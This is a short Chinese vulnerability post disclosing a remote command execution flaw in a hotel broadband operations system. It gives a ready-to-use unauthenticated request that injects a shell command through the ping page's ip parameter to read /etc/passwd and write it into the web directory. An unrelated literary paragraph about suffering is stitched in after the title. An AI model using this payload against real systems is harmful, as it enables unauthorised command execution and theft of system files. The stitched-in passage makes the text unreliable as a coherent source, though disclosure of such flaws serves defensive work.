酒店宽带运营系统远程命令执行

他是在社会的最低层挣扎，为了几个钱而受尽折磨；但他已不仅仅将此看作是谋生活命——职业的高贵与低贱，不能说明一个人生活的价值。恰恰相反，他现在倒很“热爱”自己的苦难。通过一段血火般的洗礼，他相信，自己历尽千辛万苦而酿造出的生活之蜜，肯定比轻而易举拿来的更有滋味——他自嘲地把自己的这种认识叫做“关于苦难的学说”……

漏洞描述

酒店宽带运营系统存在远程命令执行漏洞，漏洞文件中ip参数未过滤造成命令执行

漏洞复现

访问漏洞url：
GET传入参数后直接命令执行，并且文件无权限要求

/manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../1.txt&id=1

漏洞证明

文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。

免责声明：由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失，均由使用者本人负责， 文章作者不为此承担任何责任。

转载声明：儒道易行 拥有对此文章的修改和解释权，如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经作者允许，不得任意修改或者增减此文章的内容，不得以任何方式将其用于商业目的。

CSDN:
https://blog.csdn.net/weixin_48899364?type=blog

公众号：
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect

博客:
https://rdyx0.github.io/

先知社区：
https://xz.aliyun.com/u/37846

SecIN:
https://www.sec-in.com/author/3097

FreeBuf：
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85